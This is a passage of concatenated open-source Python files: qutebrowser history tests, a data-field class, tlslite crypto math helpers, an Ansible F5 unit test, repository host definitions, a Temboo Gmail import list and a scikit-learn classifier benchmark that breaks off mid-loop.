'12345 http://qutebrowser.org/ blah', ])) hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') next(hist.async_read()) with pytest.raises(StopIteration): next(hist.async_read()) expected = "Ignoring async_read() because reading is started." assert len(caplog.records) == 1 assert caplog.records[0].msg == expected def test_async_read_no_datadir(qtbot, config_stub, fake_save_manager): config_stub.data = {'general': {'private-browsing': False}} hist = history.WebHistory(hist_dir=None, hist_name='history') with qtbot.waitSignal(hist.async_read_done): list(hist.async_read()) @pytest.mark.parametrize('redirect', [True, False]) def test_adding_item_during_async_read(qtbot, hist, redirect): """Check what happens when adding URL while reading the history.""" url = QUrl('http://www.example.com/') with qtbot.assertNotEmitted(hist.add_completion_item), \ qtbot.assertNotEmitted(hist.item_added): hist.add_url(url, redirect=redirect, atime=12345) if redirect: with qtbot.assertNotEmitted(hist.add_completion_item): with qtbot.waitSignal(hist.async_read_done): list(hist.async_read()) else: with qtbot.waitSignals([hist.add_completion_item, hist.async_read_done]): list(hist.async_read()) assert not hist._temp_history expected = history.Entry(url=url, atime=12345, redirect=redirect, title="") assert list(hist.history_dict.values()) == [expected] def test_private_browsing(qtbot, tmpdir, fake_save_manager, config_stub): """Make sure no data is saved at all with private browsing.""" config_stub.data = {'general': {'private-browsing': True}} private_hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='history') # Before initial read with qtbot.assertNotEmitted(private_hist.add_completion_item), \ qtbot.assertNotEmitted(private_hist.item_added): private_hist.add_url(QUrl('http://www.example.com/')) assert not private_hist._temp_history # read with qtbot.assertNotEmitted(private_hist.add_completion_item), \ qtbot.assertNotEmitted(private_hist.item_added): with qtbot.waitSignals([private_hist.async_read_done]): list(private_hist.async_read()) # after read with qtbot.assertNotEmitted(private_hist.add_completion_item), \ qtbot.assertNotEmitted(private_hist.item_added): private_hist.add_url(QUrl('http://www.example.com/')) assert not private_hist._temp_history assert not private_hist._new_history assert not private_hist.history_dict def test_iter(hist): list(hist.async_read()) url = QUrl('http://www.example.com/') hist.add_url(url, atime=12345) entry = history.Entry(url=url, atime=12345, redirect=False, title="") assert list(hist) == [entry] def test_len(hist): assert len(hist) == 0 list(hist.async_read()) url = QUrl('http://www.example.com/') hist.add_url(url) assert len(hist) == 1 @pytest.mark.parametrize('line', [ '12345 http://example.com/ title', # with title '67890 http://example.com/', # no title '12345 http://qutebrowser.org/ ', # trailing space ' ', '', ]) def test_read(hist, tmpdir, line): (tmpdir / 'filled-history').write(line + '\n') hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') list(hist.async_read()) def test_updated_entries(hist, tmpdir): (tmpdir / 'filled-history').write('12345 http://example.com/\n' '67890 http://example.com/\n') hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') list(hist.async_read()) assert hist.history_dict['http://example.com/'].atime == 67890 hist.add_url(QUrl('http://example.com/'), atime=99999) assert hist.history_dict['http://example.com/'].atime == 99999 def test_invalid_read(hist, tmpdir, caplog): (tmpdir / 'filled-history').write('foobar\n12345 http://example.com/') hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') with caplog.at_level(logging.WARNING): list(hist.async_read()) entries = list(hist.history_dict.values()) assert len(entries) == 1 assert len(caplog.records) == 1 msg = "Invalid history entry 'foobar': 2 or 3 fields expected!" assert caplog.records[0].msg == msg def test_get_recent(hist, tmpdir): (tmpdir / 'filled-history').write('12345 http://example.com/') hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') list(hist.async_read()) hist.add_url(QUrl('http://www.qutebrowser.org/'), atime=67890) lines = hist.get_recent() expected = ['12345 http://example.com/', '67890 http://www.qutebrowser.org/'] assert lines == expected def test_save(hist, tmpdir): hist_file = tmpdir / 'filled-history' hist_file.write('12345 http://example.com/\n') hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') list(hist.async_read()) hist.add_url(QUrl('http://www.qutebrowser.org/'), atime=67890) hist.save() lines = hist_file.read().splitlines() expected = ['12345 http://example.com/', '67890 http://www.qutebrowser.org/'] assert lines == expected hist.add_url(QUrl('http://www.the-compiler.org/'), atime=99999) hist.save() expected.append('99999 http://www.the-compiler.org/') lines = hist_file.read().splitlines() assert lines == expected def test_clear(qtbot, hist, tmpdir): hist_file = tmpdir / 'filled-history' hist_file.write('12345 http://example.com/\n') hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') list(hist.async_read()) hist.add_url(QUrl('http://www.qutebrowser.org/')) with qtbot.waitSignal(hist.cleared): hist.clear() assert not hist_file.read() assert not hist.history_dict assert not hist._new_history hist.add_url(QUrl('http://www.the-compiler.org/'), atime=67890) hist.save() lines = hist_file.read().splitlines() assert lines == ['67890 http://www.the-compiler.org/'] def test_add_item(qtbot, hist): list(hist.async_read()) url = 'http://www.example.com/' with qtbot.waitSignals([hist.add_completion_item, hist.item_added]): hist.add_url(QUrl(url), atime=12345, title="the title") entry = history.Entry(url=QUrl(url), redirect=False, atime=12345, title="the title") assert hist.history_dict[url] == entry def test_add_item_redirect(qtbot, hist): list(hist.async_read()) url = 'http://www.example.com/' with qtbot.assertNotEmitted(hist.add_completion_item): with qtbot.waitSignal(hist.item_added): hist.add_url(QUrl(url), redirect=True, atime=12345) entry = history.Entry(url=QUrl(url), redirect=True, atime=12345, title="") assert hist.history_dict[url] == entry def test_add_item_redirect_update(qtbot, tmpdir): """A redirect update added should override a non-redirect one.""" url = 'http://www.example.com/' hist_file = tmpdir / 'filled-history' hist_file.write('12345 {}\n'.format(url)) hist = history.WebHistory(hist_dir=str(tmpdir), hist_name='filled-history') list(hist.async_read()) with qtbot.assertNotEmitted(hist.add_completion_item): with qtbot.waitSignal(hist.item_added): hist.add_url(QUrl(url), redirect=True, atime=67890) entry = history.Entry(url=QUrl(url), redirect=True, atime=67890, title="") assert hist.history_dict[url] == entry @pytest.mark.parametrize('line, expected', [ ( # old format without title '12345 http://example.com/', history.Entry(atime=12345, url=QUrl('http://example.com/'), title='',) ), ( # trailing space without title '12345 http://example.com/ ', history.Entry(atime=12345, url=QUrl('http://example.com/'), title='',) ), ( # new format with title '12345 http://example.com/ this is a title', history.Entry(atime=12345, url=QUrl('http://example.com/'), title='this is a title') ), ( # weird NUL bytes '\x0012345 http://example.com/', history.Entry(atime=12345, url=QUrl('http://example.com/'), title=''), ), ( # redirect flag '12345-r http://example.com/ this is a title', history.Entry(atime=12345, url=QUrl('http://example.com/'), title='this is a title', redirect=True) ), ]) def test_entry_parse_valid(line, expected): entry = history.Entry.from_str(line) assert entry == expected @pytest.mark.parametrize('line', [ '12345', # one field '12345 ::', # invalid URL 'xyz http://www.example.com/', # invalid timestamp '12345-x http://www.example.com/', # invalid flags '12345-r-r http://www.example.com/', # double flags ]) def test_entry_parse_invalid(line): with pytest.raises(ValueError): history.Entry.from_str(line) @hypothesis.given(strategies.text()) def test_entry_parse_hypothesis(text): """Make sure parsing works or gives us ValueError.""" try: history.Entry.from_str(text) except ValueError: pass @pytest.mark.parametrize('entry, expected', [ # simple ( history.Entry(12345, QUrl('http://example.com/'), "the title"), "12345 http://example.com/ the title", ), # timestamp as float ( history.Entry(12345.678, QUrl('http://example.com/'), "the title"), "12345 http://example.com/ the title", ), # no title ( history.Entry(12345.678, QUrl('http://example.com/'), ""), "12345 http://example.com/", ), # redirect flag ( history.Entry(12345.678, QUrl('http://example.com/'), "", redirect=True), "12345-r http://example.com/", ), ]) def test_entry_str(entry, expected): assert str(entry) == expected @pytest.yield_fixture def hist_interface(): entry = history.Entry(atime=0, url=QUrl('http://www.example.com/'), title='example') history_dict = {'http://www.example.com/': entry} fake_hist = FakeWebHistory(history_dict) interface = history.WebHistoryInterface(fake_hist) QWebHistoryInterface.setDefaultInterface(interface) yield QWebHistoryInterface.setDefaultInterface(None) def test_history_interface(qtbot, webview, hist_interface): html = "<a href='about:blank'>foo</a>" data = base64.b64encode(html.encode('utf-8')).decode('ascii') url = QUrl("data:text/html;charset=utf-8;base64,{}".format(data)) with qtbot.waitSignal(webview.loadFinished): webview.load(url) def test_init(qapp, tmpdir, monkeypatch, fake_save_manager): monkeypatch.setattr(history.standarddir, 'data', lambda: str(tmpdir)) history.init(qapp) hist = objreg.get('web-history') assert hist.parent() is qapp assert QWebHistoryInterface.defaultInterface()._history is hist assert fake_save_manager.add_saveable.called objreg.delete('web-history')
chadspratt/AveryDB
refs/heads/master
field.py
1
"""Field stores all information about a given field. The field object is used to represent fields from any data format and assists with converting fields between the inputs and the output.""" ## # Copyright 2013 Chad Spratt # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ## class Field(object): """Stores a field definition.""" def __init__(self, fieldname, fieldattributes=None, fieldvalue='', source=None, dataformat=None, namelen=10): if fieldattributes is None: fieldattributes = {} # used for resetting a field self.originalname = fieldname if dataformat is not None: # preserves field attributes if output format is changed, changed back self.attributesbyformat = {dataformat: fieldattributes.copy()} else: self.attributesbyformat = {} self.originalvalue = fieldvalue # name and value that will be used in the output self.name = fieldname[:namelen] self.source = source self.value = fieldvalue # dictionary of attribute names and values, stored by file format self.attributes = fieldattributes self.namelenlimit = namelen self.namegen = self.namegenerator(namelen) # tablename_fieldname used for storage in sqlite # assigned by table during conversion of the data to sqlite self.sqlname = None def namegenerator(self, lenlimit): """Yields alternate field names for when there's a naming conflict.""" # append a number to create a different name dupecount = 1 if lenlimit is None: while True: yield self.originalname + str(dupecount) dupecount += 1 # append a number and trim the name as needed to meet the limit else: namelen = len(self.originalname) # store original length countlen = 1 namelen = lenlimit - countlen while True: # append next number to original alias yield self.originalname[:namelen] + str(dupecount) dupecount += 1 countlen = len(str(dupecount)) namelen = lenlimit - countlen def getnewname(self): """Supplies a new unique name candidate.""" return self.namegen.next() def resetname(self): """Resets the field name, though it will be changed if it conflicts.""" # trim name in case length limit has changed self.name = self.name[:self.namelenlimit] # reset the name generator self.namegen = self.namegenerator(self.namelenlimit) # Not currently used def resetvalue(self): """Resets the value of a field to it's original value.""" self.value = self.originalvalue def copy(self): """Creates a deep copy of the field.""" fieldcopy = Field(self.name, self.attributes, self.value) for dataformat in self.attributesbyformat: fieldcopy.attributesbyformat[dataformat] = ( self.attributesbyformat[dataformat].copy()) fieldcopy.originalname = self.originalname fieldcopy.originalvalue = self.originalvalue fieldcopy.source = self.source return fieldcopy def hasattribute(self, attributename): """Check if the field has an attribute by the given name.""" return attributename in self.attributes def getattribute(self, attributename): """Get an attribute value by name (case-insensitive).""" for key in self.attributes: if attributename.lower() == key.lower(): return self.attributes[key] # If the field doesn't have the attribute, return None. # possible ambiguity if an attribute had the value of None return None def getattributes(self): """Returns all attributes (eg: name, type) of a field as a list.""" attrlist = [self.name] attrlist.extend(self.attributes.values()) attrlist.append(self.value) return attrlist def setformat(self, dataformat, newattributes=None): """Set new attributes for the field when the format is changed.""" # Check if the attributes have already been defined for dataformat if dataformat in self.attributesbyformat: self.attributes = self.attributesbyformat[dataformat] else: # If the format isn't already defined, attributes are required if newattributes is None: raise ValueError('Field.setformat: ' + dataformat + ' not ' + 'defined, need attribute dictionary') self.attributes = newattributes self.attributesbyformat[dataformat] = newattributes def hasformat(self, dataformat): """Check if a format is defined for this field.""" return dataformat in self.attributesbyformat def __getitem__(self, key): if key == 'name' or key == 0: return self.name elif key == 'value' or key == len(self.attributes) + 1: return self.value elif key in self.attributes: return self.attributes[key] return self.attributes.values()[key - 1] def __setitem__(self, key, value): if key == 'name' or key == 0: self.name = value elif key == 'value' or key == len(self.attributes) + 1: self.value = value # set attribute by index elif type(key) == int or key.isdigit(): attrname = self.attributes.keys()[key - 1] self.attributes[attrname] = value # set attribute by name else: self.attributes[key] = value def __str__(self): return ('name: ' + self.name + '\nattr: ' + str(self.attributes) + '\nvalue: ' + self.value)
VanirAOSP/external_chromium_org
refs/heads/kk44
third_party/tlslite/tlslite/utils/cryptomath.py
77
"""cryptomath module This module has basic math/crypto code.""" import os import math import base64 import binascii # The sha module is deprecated in Python 2.6 try: import sha except ImportError: from hashlib import sha1 as sha # The md5 module is deprecated in Python 2.6 try: import md5 except ImportError: from hashlib import md5 from compat import * # ************************************************************************** # Load Optional Modules # ************************************************************************** # Try to load M2Crypto/OpenSSL try: from M2Crypto import m2 m2cryptoLoaded = True except ImportError: m2cryptoLoaded = False # Try to load cryptlib try: import cryptlib_py try: cryptlib_py.cryptInit() except cryptlib_py.CryptException, e: #If tlslite and cryptoIDlib are both present, #they might each try to re-initialize this, #so we're tolerant of that. if e[0] != cryptlib_py.CRYPT_ERROR_INITED: raise cryptlibpyLoaded = True except ImportError: cryptlibpyLoaded = False #Try to load GMPY try: import gmpy gmpyLoaded = True except ImportError: gmpyLoaded = False #Try to load pycrypto try: import Crypto.Cipher.AES pycryptoLoaded = True except ImportError: pycryptoLoaded = False # ************************************************************************** # PRNG Functions # ************************************************************************** # Get os.urandom PRNG try: os.urandom(1) def getRandomBytes(howMany): return stringToBytes(os.urandom(howMany)) prngName = "os.urandom" except: # Else get cryptlib PRNG if cryptlibpyLoaded: def getRandomBytes(howMany): randomKey = cryptlib_py.cryptCreateContext(cryptlib_py.CRYPT_UNUSED, cryptlib_py.CRYPT_ALGO_AES) cryptlib_py.cryptSetAttribute(randomKey, cryptlib_py.CRYPT_CTXINFO_MODE, cryptlib_py.CRYPT_MODE_OFB) cryptlib_py.cryptGenerateKey(randomKey) bytes = createByteArrayZeros(howMany) cryptlib_py.cryptEncrypt(randomKey, bytes) return bytes prngName = "cryptlib" else: #Else get UNIX /dev/urandom PRNG try: devRandomFile = open("/dev/urandom", "rb") def getRandomBytes(howMany): return stringToBytes(devRandomFile.read(howMany)) prngName = "/dev/urandom" except IOError: #Else get Win32 CryptoAPI PRNG try: import win32prng def getRandomBytes(howMany): s = win32prng.getRandomBytes(howMany) if len(s) != howMany: raise AssertionError() return stringToBytes(s) prngName ="CryptoAPI" except ImportError: #Else no PRNG :-( def getRandomBytes(howMany): raise NotImplementedError("No Random Number Generator "\ "available.") prngName = "None" # ************************************************************************** # Converter Functions # ************************************************************************** def bytesToNumber(bytes): total = 0L multiplier = 1L for count in range(len(bytes)-1, -1, -1): byte = bytes[count] total += multiplier * byte multiplier *= 256 return total def numberToBytes(n): howManyBytes = numBytes(n) bytes = createByteArrayZeros(howManyBytes) for count in range(howManyBytes-1, -1, -1): bytes[count] = int(n % 256) n >>= 8 return bytes def bytesToBase64(bytes): s = bytesToString(bytes) return stringToBase64(s) def base64ToBytes(s): s = base64ToString(s) return stringToBytes(s) def numberToBase64(n): bytes = numberToBytes(n) return bytesToBase64(bytes) def base64ToNumber(s): bytes = base64ToBytes(s) return bytesToNumber(bytes) def stringToNumber(s): bytes = stringToBytes(s) return bytesToNumber(bytes) def numberToString(s): bytes = numberToBytes(s) return bytesToString(bytes) def base64ToString(s): try: return base64.decodestring(s) except binascii.Error, e: raise SyntaxError(e) except binascii.Incomplete, e: raise SyntaxError(e) def stringToBase64(s): return base64.encodestring(s).replace("\n", "") def mpiToNumber(mpi): #mpi is an openssl-format bignum string if (ord(mpi[4]) & 0x80) !=0: #Make sure this is a positive number raise AssertionError() bytes = stringToBytes(mpi[4:]) return bytesToNumber(bytes) def numberToMPI(n): bytes = numberToBytes(n) ext = 0 #If the high-order bit is going to be set, #add an extra byte of zeros if (numBits(n) & 0x7)==0: ext = 1 length = numBytes(n) + ext bytes = concatArrays(createByteArrayZeros(4+ext), bytes) bytes[0] = (length >> 24) & 0xFF bytes[1] = (length >> 16) & 0xFF bytes[2] = (length >> 8) & 0xFF bytes[3] = length & 0xFF return bytesToString(bytes) # ************************************************************************** # Misc. Utility Functions # ************************************************************************** def numBytes(n): if n==0: return 0 bits = numBits(n) return int(math.ceil(bits / 8.0)) def hashAndBase64(s): return stringToBase64(sha.sha(s).digest()) def getBase64Nonce(numChars=22): #defaults to an 132 bit nonce bytes = getRandomBytes(numChars) bytesStr = "".join([chr(b) for b in bytes]) return stringToBase64(bytesStr)[:numChars] # ************************************************************************** # Big Number Math # ************************************************************************** def getRandomNumber(low, high): if low >= high: raise AssertionError() howManyBits = numBits(high) howManyBytes = numBytes(high) lastBits = howManyBits % 8 while 1: bytes = getRandomBytes(howManyBytes) if lastBits: bytes[0] = bytes[0] % (1 << lastBits) n = bytesToNumber(bytes) if n >= low and n < high: return n def gcd(a,b): a, b = max(a,b), min(a,b) while b: a, b = b, a % b return a def lcm(a, b): #This will break when python division changes, but we can't use // cause #of Jython return (a * b) / gcd(a, b) #Returns inverse of a mod b, zero if none #Uses Extended Euclidean Algorithm def invMod(a, b): c, d = a, b uc, ud = 1, 0 while c != 0: #This will break when python division changes, but we can't use // #cause of Jython q = d / c c, d = d-(q*c), c uc, ud = ud - (q * uc), uc if d == 1: return ud % b return 0 if gmpyLoaded: def powMod(base, power, modulus): base = gmpy.mpz(base) power = gmpy.mpz(power) modulus = gmpy.mpz(modulus) result = pow(base, power, modulus) return long(result) else: #Copied from Bryan G. Olson's post to comp.lang.python #Does left-to-right instead of pow()'s right-to-left, #thus about 30% faster than the python built-in with small bases def powMod(base, power, modulus): nBitScan = 5 """ Return base**power mod modulus, using multi bit scanning with nBitScan bits at a time.""" #TREV - Added support for negative exponents negativeResult = False if (power < 0): power *= -1 negativeResult = True exp2 = 2**nBitScan mask = exp2 - 1 # Break power into a list of digits of nBitScan bits. # The list is recursive so easy to read in reverse direction. nibbles = None while power: nibbles = int(power & mask), nibbles power = power >> nBitScan # Make a table of powers of base up to 2**nBitScan - 1 lowPowers = [1] for i in xrange(1, exp2): lowPowers.append((lowPowers[i-1] * base) % modulus) # To exponentiate by the first nibble, look it up in the table nib, nibbles = nibbles prod = lowPowers[nib] # For the rest, square nBitScan times, then multiply by # base^nibble while nibbles: nib, nibbles = nibbles for i in xrange(nBitScan): prod = (prod * prod) % modulus if nib: prod = (prod * lowPowers[nib]) % modulus #TREV - Added support for negative exponents if negativeResult: prodInv = invMod(prod, modulus) #Check to make sure the inverse is correct if (prod * prodInv) % modulus != 1: raise AssertionError() return prodInv return prod #Pre-calculate a sieve of the ~100 primes < 1000: def makeSieve(n): sieve = range(n) for count in range(2, int(math.sqrt(n))): if sieve[count] == 0: continue x = sieve[count] * 2 while x < len(sieve): sieve[x] = 0 x += sieve[count] sieve = [x for x in sieve[2:] if x] return sieve sieve = makeSieve(1000) def isPrime(n, iterations=5, display=False): #Trial division with sieve for x in sieve: if x >= n: return True if n % x == 0: return False #Passed trial division, proceed to Rabin-Miller #Rabin-Miller implemented per Ferguson & Schneier #Compute s, t for Rabin-Miller if display: print "*", s, t = n-1, 0 while s % 2 == 0: s, t = s/2, t+1 #Repeat Rabin-Miller x times a = 2 #Use 2 as a base for first iteration speedup, per HAC for count in range(iterations): v = powMod(a, s, n) if v==1: continue i = 0 while v != n-1: if i == t-1: return False else: v, i = powMod(v, 2, n), i+1 a = getRandomNumber(2, n) return True def getRandomPrime(bits, display=False): if bits < 10: raise AssertionError() #The 1.5 ensures the 2 MSBs are set #Thus, when used for p,q in RSA, n will have its MSB set # #Since 30 is lcm(2,3,5), we'll set our test numbers to #29 % 30 and keep them there low = (2L ** (bits-1)) * 3/2 high = 2L ** bits - 30 p = getRandomNumber(low, high) p += 29 - (p % 30) while 1: if display: print ".", p += 30 if p >= high: p = getRandomNumber(low, high) p += 29 - (p % 30) if isPrime(p, display=display): return p #Unused at the moment... def getRandomSafePrime(bits, display=False): if bits < 10: raise AssertionError() #The 1.5 ensures the 2 MSBs are set #Thus, when used for p,q in RSA, n will have its MSB set # #Since 30 is lcm(2,3,5), we'll set our test numbers to #29 % 30 and keep them there low = (2 ** (bits-2)) * 3/2 high = (2 ** (bits-1)) - 30 q = getRandomNumber(low, high) q += 29 - (q % 30) while 1: if display: print ".", q += 30 if (q >= high): q = getRandomNumber(low, high) q += 29 - (q % 30) #Ideas from Tom Wu's SRP code #Do trial division on p and q before Rabin-Miller if isPrime(q, 0, display=display): p = (2 * q) + 1 if isPrime(p, display=display): if isPrime(q, display=display): return p
chouseknecht/ansible
refs/heads/devel
test/units/modules/network/f5/test_bigip_iapp_template.py
22
# -*- coding: utf-8 -*- # # Copyright (c) 2017 F5 Networks Inc. # GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os import json import pytest import sys if sys.version_info < (2, 7): pytestmark = pytest.mark.skip("F5 Ansible modules require Python >= 2.7") from ansible.module_utils.basic import AnsibleModule try: from library.modules.bigip_iapp_template import Parameters from library.modules.bigip_iapp_template import ModuleManager from library.modules.bigip_iapp_template import ArgumentSpec # In Ansible 2.8, Ansible changed import paths. from test.units.compat import unittest from test.units.compat.mock import Mock from test.units.modules.utils import set_module_args except ImportError: from ansible.modules.network.f5.bigip_iapp_template import Parameters from ansible.modules.network.f5.bigip_iapp_template import ArgumentSpec from ansible.modules.network.f5.bigip_iapp_template import ModuleManager # Ansible 2.8 imports from units.compat import unittest from units.compat.mock import Mock from units.modules.utils import set_module_args fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures') fixture_data = {} def load_fixture(name): path = os.path.join(fixture_path, name) if path in fixture_data: return fixture_data[path] with open(path) as f: data = f.read() try: data = json.loads(data) except Exception: pass fixture_data[path] = data return data class TestParameters(unittest.TestCase): def test_module_parameters(self): iapp = load_fixture('create_iapp_template.iapp') args = dict( content=iapp ) p = Parameters(params=args) assert p.name == 'foo.iapp' def test_module_parameters_custom_name(self): iapp = load_fixture('create_iapp_template.iapp') args = dict( content=iapp, name='foobar' ) p = Parameters(params=args) assert p.name == 'foobar' assert 'sys application template /Common/foobar' in p.content def test_module_parameters_custom_partition(self): iapp = load_fixture('create_iapp_template.iapp') args = dict( content=iapp, partition='foobar' ) p = Parameters(params=args) assert p.name == 'foo.iapp' assert 'sys application template /foobar/foo.iapp' in p.content class TestManager(unittest.TestCase): def setUp(self): self.spec = ArgumentSpec() def test_create_iapp_template(self, *args): # Configure the arguments that would be sent to the Ansible module set_module_args(dict( content=load_fixture('basic-iapp.tmpl'), provider=dict( server='localhost', password='password', user='admin' ) )) module = AnsibleModule( argument_spec=self.spec.argument_spec, supports_check_mode=self.spec.supports_check_mode ) mm = ModuleManager(module=module) # Override methods to force specific logic in the module to happen mm.exists = Mock(side_effect=[False, True]) mm.create_on_device = Mock(return_value=True) results = mm.exec_module() assert results['changed'] is True def test_update_iapp_template(self, *args): # Configure the arguments that would be sent to the Ansible module set_module_args(dict( content=load_fixture('basic-iapp.tmpl'), provider=dict( server='localhost', password='password', user='admin' ) )) current1 = Parameters(params=load_fixture('load_sys_application_template_w_new_checksum.json')) current2 = Parameters(params=load_fixture('load_sys_application_template_w_old_checksum.json')) module = AnsibleModule( argument_spec=self.spec.argument_spec, supports_check_mode=self.spec.supports_check_mode ) mm = ModuleManager(module=module) # Override methods to force specific logic in the module to happen mm.exists = Mock(side_effect=[True, True]) mm.create_on_device = Mock(return_value=True) mm.read_current_from_device = Mock(return_value=current1) mm.template_in_use = Mock(return_value=False) mm._get_temporary_template = Mock(return_value=current2) mm._remove_iapp_checksum = Mock(return_value=None) mm._generate_template_checksum_on_device = Mock(return_value=None) results = mm.exec_module() assert results['changed'] is True def test_delete_iapp_template(self, *args): set_module_args(dict( content=load_fixture('basic-iapp.tmpl'), state='absent', provider=dict( server='localhost', password='password', user='admin' ) )) module = AnsibleModule( argument_spec=self.spec.argument_spec, supports_check_mode=self.spec.supports_check_mode ) mm = ModuleManager(module=module) # Override methods to force specific logic in the module to happen mm.exists = Mock(side_effect=[True, False]) mm.remove_from_device = Mock(return_value=True) results = mm.exec_module() assert results['changed'] is True def test_delete_iapp_template_idempotent(self, *args): set_module_args(dict( content=load_fixture('basic-iapp.tmpl'), state='absent', provider=dict( server='localhost', password='password', user='admin' ) )) module = AnsibleModule( argument_spec=self.spec.argument_spec, supports_check_mode=self.spec.supports_check_mode ) mm = ModuleManager(module=module) # Override methods to force specific logic in the module to happen mm.exists = Mock(side_effect=[False, False]) results = mm.exec_module() assert results['changed'] is False
dghubble/pyrepo
refs/heads/master
pyrepo/hosts.py
1
# -*- coding: utf-8 -*- """ This module provides the repository Host type and common Host objects (github_host, bitbucket_host). """ import re class Host(object): """ Represents a host of repositories and how import_path identifiers of repositories are mapped to the host's urls. """ def __init__(self, command_name_func=None, **kwargs): """ :param str name: name of the repository host :param str prefix: prefix to matching import paths should have :param str pattern: regex pattern for the import path :param str command_name: name of the command for interacting with hosted repositories :param func command_name_func: func(`import_path`) which returns the str name of a command to be used for the host's `import_path` repository. May raise `ImportPathError`. Defaults to None and `command_name` is used directly. :param str url_format: format string for the repository url, which should contain a `import_path` format specifier. :raises: ValueError """ self.name = kwargs["name"] self.prefix = kwargs["prefix"] self.pattern = re.compile(kwargs["pattern"]) self.command_name = kwargs["command_name"] self.command_name_func = command_name_func self.url_format = kwargs["url_format"] if self.command_name_func is None and self.command_name is None: raise ValueError(("Host {0} `command_name` and" "`command_name_func` cannot both be None") .format(self.name)) #: github.com repository host definition github_host = Host( name="Github", prefix="github.com/", pattern="^(?P<repo_root>github\.com/[A-Za-z0-9_.\-]+/[A-Za-z0-9_.\-]+)(/[A-Za-z0-9_.\-]+)*$", command_name="git", url_format="https://{import_path}") #: bitbucket.org repository host definition bitbucket_host = Host( name="Bitbucket", prefix="bitbucket.org/", pattern="^(?P<repo_root>bitbucket\.org/(?P<bitname>[A-Za-z0-9_.\-]+/[A-Za-z0-9_.\-]+))(/[A-Za-z0-9_.\-]+)*$", command_name="git", url_format="https://{import_path}") #: default set of repository hosts default_hosts = [github_host, bitbucket_host]
lupyuen/RaspberryPiImage
refs/heads/master
home/pi/GrovePi/Software/Python/others/temboo/Library/Google/Gmailv2/Messages/__init__.py
4
from temboo.Library.Google.Gmailv2.Messages.ClearStoredHistory import ClearStoredHistory, ClearStoredHistoryInputSet, ClearStoredHistoryResultSet, ClearStoredHistoryChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.DeleteMessage import DeleteMessage, DeleteMessageInputSet, DeleteMessageResultSet, DeleteMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.GetLatestMessage import GetLatestMessage, GetLatestMessageInputSet, GetLatestMessageResultSet, GetLatestMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.GetMessage import GetMessage, GetMessageInputSet, GetMessageResultSet, GetMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.GetNextMessage import GetNextMessage, GetNextMessageInputSet, GetNextMessageResultSet, GetNextMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.InsertMessage import InsertMessage, InsertMessageInputSet, InsertMessageResultSet, InsertMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.ListMessages import ListMessages, ListMessagesInputSet, ListMessagesResultSet, ListMessagesChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.ModifyMessage import ModifyMessage, ModifyMessageInputSet, ModifyMessageResultSet, ModifyMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.SendMessage import SendMessage, SendMessageInputSet, SendMessageResultSet, SendMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.TrashMessage import TrashMessage, TrashMessageInputSet, TrashMessageResultSet, TrashMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.UnTrashMessage import UnTrashMessage, UnTrashMessageInputSet, UnTrashMessageResultSet, UnTrashMessageChoreographyExecution
roxyboy/scikit-learn
refs/heads/master
benchmarks/bench_20newsgroups.py
377
from __future__ import print_function, division from time import time import argparse import numpy as np from sklearn.dummy import DummyClassifier from sklearn.datasets import fetch_20newsgroups_vectorized from sklearn.metrics import accuracy_score from sklearn.utils.validation import check_array from sklearn.ensemble import RandomForestClassifier from sklearn.ensemble import ExtraTreesClassifier from sklearn.ensemble import AdaBoostClassifier from sklearn.linear_model import LogisticRegression from sklearn.naive_bayes import MultinomialNB ESTIMATORS = { "dummy": DummyClassifier(), "random_forest": RandomForestClassifier(n_estimators=100, max_features="sqrt", min_samples_split=10), "extra_trees": ExtraTreesClassifier(n_estimators=100, max_features="sqrt", min_samples_split=10), "logistic_regression": LogisticRegression(), "naive_bayes": MultinomialNB(), "adaboost": AdaBoostClassifier(n_estimators=10), } ############################################################################### # Data if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-e', '--estimators', nargs="+", required=True, choices=ESTIMATORS) args = vars(parser.parse_args()) data_train = fetch_20newsgroups_vectorized(subset="train") data_test = fetch_20newsgroups_vectorized(subset="test") X_train = check_array(data_train.data, dtype=np.float32, accept_sparse="csc") X_test = check_array(data_test.data, dtype=np.float32, accept_sparse="csr") y_train = data_train.target y_test = data_test.target print("20 newsgroups") print("=============") print("X_train.shape = {0}".format(X_train.shape)) print("X_train.format = {0}".format(X_train.format)) print("X_train.dtype = {0}".format(X_train.dtype)) print("X_train density = {0}" "".format(X_train.nnz / np.product(X_train.shape))) print("y_train {0}".format(y_train.shape)) print("X_test {0}".format(X_test.shape)) print("X_test.format = {0}".format(X_test.format)) print("X_test.dtype = {0}".format(X_test.dtype)) print("y_test {0}".format(y_test.shape)) print() print("Classifier Training") print("===================") accuracy, train_time, test_time = {}, {}, {} for name in sorted(args["estimators"]): clf = ESTIMATORS[name] try: clf.set_params(random_state=0) except (TypeError, ValueError): pass print("Training %s ... " % name, end="") t0 = time() clf.fit(X_train, y_train) train_time[name] = time() - t0 t0 = time() y_pred = clf.predict(X_test) test_time[name] = time() - t0 accuracy[name] = accuracy_score(y_test, y_pred) 